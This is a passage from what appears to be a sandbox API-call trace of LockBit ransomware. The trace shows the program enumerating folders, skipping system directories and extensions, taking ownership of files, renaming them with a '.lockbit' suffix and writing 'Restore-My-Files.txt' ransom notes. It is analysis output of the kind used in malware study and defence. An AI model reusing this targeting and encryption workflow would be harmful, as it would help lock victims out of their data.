lpString2=".mui") returned -1 [0077.529] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0077.529] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0077.529] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0077.529] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0077.529] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0077.529] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0077.529] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0077.529] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0077.529] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0077.529] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0077.529] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0077.529] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0077.529] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0077.529] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0077.529] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0077.529] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0077.529] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0077.529] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0077.529] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0077.529] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0077.529] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0077.529] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0077.530] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0077.530] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0077.530] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0077.530] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0077.530] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0077.530] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0077.530] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0077.530] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0077.530] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0077.530] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0077.530] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0077.530] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0077.530] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0077.530] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0077.530] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0077.530] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0077.530] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0077.530] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0077.530] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0077.530] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0077.530] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0077.530] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0077.530] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0077.531] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="tipresx.dll.mui") returned -1 [0077.531] lstrcmpiW (lpString1="ntldr", lpString2="tipresx.dll.mui") returned -1 [0077.531] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="tipresx.dll.mui") returned -1 [0077.531] lstrcmpiW (lpString1="bootsect.bak", lpString2="tipresx.dll.mui") returned -1 [0077.531] lstrcmpiW (lpString1="autorun.inf", lpString2="tipresx.dll.mui") returned -1 [0077.531] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\") returned="" [0077.531] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned=".mui" [0077.531] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0077.531] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0077.531] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0077.531] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0077.531] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0077.531] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0077.531] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0077.531] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0077.531] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0077.531] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0077.531] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0077.531] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0077.531] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0077.531] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0077.531] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0077.532] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0077.532] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0077.532] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0077.532] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0077.532] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0077.532] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0077.532] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0077.532] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0077.532] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0077.532] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0077.532] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0077.532] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0077.532] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0077.532] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui.lockbit") returned 81 [0077.532] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0077.532] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui.lockbit")) returned 0 [0077.532] GetLastError () returned 0x5 [0077.533] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0077.533] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0077.533] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.533] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0077.533] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0077.533] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3bc, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0077.534] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0077.534] NtQueryInformationFile (in: FileHandle=0x3bc, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0077.562] NtClose (Handle=0x3bc) returned 0x0 [0077.562] RtlFreeAnsiString (AnsiString="\\") [0077.562] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3bc) returned 1 [0077.562] malloc (_Size=0x200) returned 0x53fcc0 [0077.562] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0077.562] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.562] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.562] CloseHandle (hObject=0x3bc) returned 1 [0077.562] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0077.563] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0077.563] free (_Block=0x53fcc0) [0077.563] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0077.563] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui.lockbit")) returned 1 [0077.564] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0077.564] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0077.564] malloc (_Size=0x40068) returned 0x3940048 [0077.564] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=4096) returned 1 [0077.564] ReadFile (in: hFile=0x3bc, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0077.566] GetLastError () returned 0x3e5 [0077.566] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR") returned 1 [0077.566] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\Restore-My-Files.txt") returned 78 [0077.566] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0077.566] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0077.566] malloc (_Size=0x40068) returned 0x20abae0 [0077.567] WriteFile (in: hFile=0x3c0, lpBuffer=0x2064f58*, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x2064f58*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0077.568] GetLastError () returned 0x3e5 [0077.568] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31667d9, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe337baef, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe337baef, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0077.568] GetLastError () returned 0x12 [0077.569] FindClose (in: hFindFile=0x2e3290 | out: hFindFile=0x2e3290) returned 1 [0077.569] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="en-US", cAlternateFileName="")) returned 1 [0077.569] lstrcmpiW (lpString1=".", lpString2="en-US") returned -1 [0077.569] lstrcmpiW (lpString1="..", lpString2="en-US") returned -1 [0077.569] lstrcmpiW (lpString1="en-US", lpString2="$windows.~bt") returned 1 [0077.569] lstrcmpiW (lpString1="en-US", lpString2="intel") returned -1 [0077.569] lstrcmpiW (lpString1="en-US", lpString2="msocache") returned -1 [0077.569] lstrcmpiW (lpString1="en-US", lpString2="$recycle.bin") returned 1 [0077.569] lstrcmpiW (lpString1="en-US", lpString2="$windows.~ws") returned 1 [0077.569] lstrcmpiW (lpString1="en-US", lpString2="tor browser") returned -1 [0077.569] lstrcmpiW (lpString1="en-US", lpString2="boot") returned 1 [0077.569] lstrcmpiW (lpString1="en-US", lpString2="system volume information") returned -1 [0077.569] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0077.569] lstrcmpiW (lpString1="en-US", lpString2="google") returned -1 [0077.569] lstrcmpiW (lpString1="en-US", lpString2="application data") returned 1 [0077.569] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0077.569] lstrcmpiW (lpString1="en-US", lpString2="windows.old") returned -1 [0077.569] lstrcmpiW (lpString1="en-US", lpString2="appdata") returned 1 [0077.569] lstrcmpiW (lpString1="en-US", lpString2="Windows nt") returned -1 [0077.569] lstrcmpiW (lpString1="en-US", lpString2="Msbuild") returned -1 [0077.569] lstrcmpiW (lpString1="en-US", lpString2="Microsoft") returned -1 [0077.569] lstrcmpiW (lpString1="en-US", lpString2="All users") returned 1 [0077.569] lstrcmpiW (lpString1="en-US", lpString2="mozilla") returned -1 [0077.570] wsprintfW (in: param_1=0x344d200, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 57 [0077.570] wsprintfW (in: param_1=0x344ca60, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*") returned 59 [0077.570] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\*"), fInfoLevelId=0x0, lpFindFileData=0x344cf48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344cf48) returned 0x2e3290 [0077.570] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0077.570] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0077.570] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0077.570] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0077.570] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a407849, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9a407849, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x9a407849, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x15e00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="boxed-correct.avi", cAlternateFileName="")) returned 1 [0077.570] lstrcmpiW (lpString1=".", lpString2="boxed-correct.avi") returned -1 [0077.570] lstrcmpiW (lpString1="..", lpString2="boxed-correct.avi") returned -1 [0077.570] PathFindExtensionW (pszPath="boxed-correct.avi") returned=".avi" [0077.570] lstrcmpiW (lpString1=".386", lpString2=".avi") returned -1 [0077.570] lstrcmpiW (lpString1=".cmd", lpString2=".avi") returned 1 [0077.570] lstrcmpiW (lpString1=".exe", lpString2=".avi") returned 1 [0077.570] lstrcmpiW (lpString1=".ani", lpString2=".avi") returned -1 [0077.570] lstrcmpiW (lpString1=".adv", lpString2=".avi") returned -1 [0077.570] lstrcmpiW (lpString1=".theme", lpString2=".avi") returned 1 [0077.570] lstrcmpiW (lpString1=".msi", lpString2=".avi") returned 1 [0077.570] lstrcmpiW (lpString1=".msp", lpString2=".avi") returned 1 [0077.570] lstrcmpiW (lpString1=".com", lpString2=".avi") returned 1 [0077.570] lstrcmpiW (lpString1=".diagpkg", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".nls", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".diagcab", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".lock", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".ocx", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".mpa", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".cpl", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".mod", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".hta", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".icns", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".prf", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".rtp", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".diagcfg", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".msstyles", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".bin", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".hlp", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".shs", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".drv", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".wpx", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".bat", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".rom", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".msc", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".spl", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".ps1", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".msu", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".ics", lpString2=".avi") returned 1 [0077.571] lstrcmpiW (lpString1=".key", lpString2=".avi") returned 1 [0077.572] lstrcmpiW (lpString1=".mp3", lpString2=".avi") returned 1 [0077.572] lstrcmpiW (lpString1=".reg", lpString2=".avi") returned 1 [0077.572] lstrcmpiW (lpString1=".dll", lpString2=".avi") returned 1 [0077.572] lstrcmpiW (lpString1=".ini", lpString2=".avi") returned 1 [0077.572] lstrcmpiW (lpString1=".idx", lpString2=".avi") returned 1 [0077.572] lstrcmpiW (lpString1=".sys", lpString2=".avi") returned 1 [0077.572] lstrcmpiW (lpString1=".hlp", lpString2=".avi") returned 1 [0077.572] lstrcmpiW (lpString1=".ico", lpString2=".avi") returned 1 [0077.572] lstrcmpiW (lpString1=".lnk", lpString2=".avi") returned 1 [0077.572] lstrcmpiW (lpString1=".rdp", lpString2=".avi") returned 1 [0077.572] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0077.572] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="boxed-correct.avi") returned 1 [0077.572] lstrcmpiW (lpString1="ntldr", lpString2="boxed-correct.avi") returned 1 [0077.572] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="boxed-correct.avi") returned 1 [0077.572] lstrcmpiW (lpString1="bootsect.bak", lpString2="boxed-correct.avi") returned -1 [0077.572] lstrcmpiW (lpString1="autorun.inf", lpString2="boxed-correct.avi") returned -1 [0077.572] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0077.572] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned=".avi" [0077.572] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0077.572] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0077.572] lstrcmpiW (lpString1=".7z", lpString2=".avi") returned -1 [0077.572] lstrcmpiW (lpString1=".ckp", lpString2=".avi") returned 1 [0077.572] lstrcmpiW (lpString1=".dacpac", lpString2=".avi") returned 1 [0077.572] lstrcmpiW (lpString1=".db", lpString2=".avi") returned 1 [0077.572] lstrcmpiW (lpString1=".db-shm", lpString2=".avi") returned 1 [0077.572] lstrcmpiW (lpString1=".db-wal", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".db3", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".dbc", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".dbs", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".dbt", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".dbv", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".frm", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".mdf", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".mrg", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".mwb", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".myd", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".ndf", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".qry", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".sdb", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".sdf", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".sql", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".sqlite", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".sqlite3", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".sqlitedb", lpString2=".avi") returned 1 [0077.573] lstrcmpiW (lpString1=".tmd", lpString2=".avi") returned 1 [0077.573] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.lockbit") returned 83 [0077.573] lstrcmpiW (lpString1=".avi", lpString2=".lockbit") returned -1 [0077.573] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.lockbit")) returned 0 [0077.612] GetLastError () returned 0x5 [0077.613] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0077.613] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0077.613] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.613] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0077.614] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0077.614] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3b0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0077.615] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0077.615] NtQueryInformationFile (in: FileHandle=0x3b0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0077.627] NtClose (Handle=0x3b0) returned 0x0 [0077.627] RtlFreeAnsiString (AnsiString="\\") [0077.627] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3b0) returned 1 [0077.627] malloc (_Size=0x200) returned 0x53fcc0 [0077.628] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0077.628] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.628] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.628] CloseHandle (hObject=0x3b0) returned 1 [0077.628] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0077.628] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0077.629] free (_Block=0x53fcc0) [0077.629] lstrcmpiW (lpString1=".avi", lpString2=".lockbit") returned -1 [0077.629] MoveFileW 